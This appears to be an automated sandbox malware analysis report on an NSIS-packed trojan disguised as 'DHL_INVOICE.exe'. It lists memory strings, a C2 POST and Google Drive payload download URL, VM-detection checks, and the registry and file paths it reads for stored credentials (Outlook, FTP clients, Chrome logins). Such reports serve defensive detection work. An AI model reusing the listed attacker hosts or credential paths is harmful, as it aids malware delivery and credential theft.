        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://216-128-145-196.cprapid.com/~wellseconds/feed/
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://216-128-145-196.cprapid.com/~wellseconds/wp-json/
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://216.128.145.196/~wellseconds/?p=9651
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error...
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://s.symcd.com06
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
        Source: DHL_INVOICE.exe, B73EF6.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
        Source: DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-3o-docs.googleusercontent.com/
        Source: DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-3o-docs.googleusercontent.com/c
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031EA000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-08-3o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com//
        Source: DHL_INVOICE.exe, 00000002.00000002.1156203660.0000000032A30000.00000004.00001000.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgvk
        Source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: DHL_INVOICE.exe, 00000002.00000003.1059894261.0000000033300000.00000004.00001000.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1059894261.000000003330A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: DHL_INVOICE.exe, 00000002.00000003.1059894261.000000003330A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: DHL_INVOICE.exe, 00000002.00000003.1059894261.000000003330A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: DHL_INVOICE.exe, 00000002.00000003.1059894261.000000003330A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: DHL_INVOICE.exe, 00000002.00000003.1096348197.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1058717530.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003215000.00000004.00000020.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: DHL_INVOICE.exe, 00000002.00000003.1053881581.0000000003215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownHTTP traffic detected: POST /~wellseconds/?p=9651 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 216.128.145.196Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A0B49A50Content-Length: 178Connection: close
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/n391lbrd9ce1mgklk8prf9qvpmeqekqt/1691688000000/04164905018868905653/*/1UU5wPEottrqzBfqrgPY_IUZEFQhT0Vgv?e=download&uuid=ab3efce8-7fc0-461d-8cd6-5289dc939099 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-08-3o-docs.googleusercontent.comConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49721 version: TLS 1.2
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00404B30 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B30

        System Summary

        barindex
        Source: initial sampleStatic PE information: Filename: DHL_INVOICE.exe
        Source: DHL_INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_0040441E0_2_0040441E
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004075FE0_2_004075FE
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00406EA80_2_00406EA8
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_6F1C23510_2_6F1C2351
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeSection loaded: edgegdi.dllJump to behavior
        Source: DHL_INVOICE.exeStatic PE information: invalid certificate
        Source: DHL_INVOICE.exeVirustotal: Detection: 26%
        Source: DHL_INVOICE.exeReversingLabs: Detection: 31%
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile read: C:\Users\user\Desktop\DHL_INVOICE.exeJump to behavior
        Source: DHL_INVOICE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\DHL_INVOICE.exe C:\Users\user\Desktop\DHL_INVOICE.exe
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess created: C:\Users\user\Desktop\DHL_INVOICE.exe C:\Users\user\Desktop\DHL_INVOICE.exe
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess created: C:\Users\user\Desktop\DHL_INVOICE.exe C:\Users\user\Desktop\DHL_INVOICE.exeJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nskE008.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@2/3
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_0040234F CoCreateInstance,0_2_0040234F
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00404085 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,0_2_00404085
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
        Source: DHL_INVOICE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: mshtml.pdbUGP source: DHL_INVOICE.exe, 00000002.00000001.936320561.0000000000649000.00000020.00000001.01000000.00000005.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.1084543933.00000000047F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_6F1C2351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F1C2351
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile created: C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.exeJump to dropped file
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: DHL_INVOICE.exe, 00000000.00000002.1082327492.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES
        Source: DHL_INVOICE.exe, 00000000.00000002.1083832605.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144580442.00000000034B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3!GC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Source: C:\Users\user\Desktop\DHL_INVOICE.exe TID: 9392Thread sleep count: 158 > 30Jump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exe TID: 8988Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeEvaded block: after key decisiongraph_0-4729
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00406719
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004065CF FindFirstFileW,FindClose,0_2_004065CF
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeAPI call chain: ExitProcess graph end nodegraph_0-4614
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: DHL_INVOICE.exe, 00000000.00000002.1082327492.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.0000000003188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh%
        Source: DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: DHL_INVOICE.exe, 00000000.00000002.1083832605.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144580442.00000000034B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3!gC:\Program Files\Qemu-ga\qemu-ga.exe
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
        Source: DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: DHL_INVOICE.exe, 00000002.00000002.1143341103.00000000031EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
        Source: DHL_INVOICE.exe, 00000000.00000002.1120738164.0000000006199000.00000004.00000800.00020000.00000000.sdmp, DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: DHL_INVOICE.exe, 00000002.00000002.1144808304.0000000004DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_6F1C2351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F1C2351
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeProcess created: C:\Users\user\Desktop\DHL_INVOICE.exe C:\Users\user\Desktop\DHL_INVOICE.exeJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: DHL_INVOICE.exe PID: 9296, type: MEMORYSTR
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
        Source: C:\Users\user\Desktop\DHL_INVOICE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: Process Memory Space: DHL_INVOICE.exe PID: 9296, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        11
        Masquerading
        2
        OS Credential Dumping
        31
        Security Software Discovery
        Remote Services1
        Email Collection
        Exfiltration Over Other Network Medium11
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
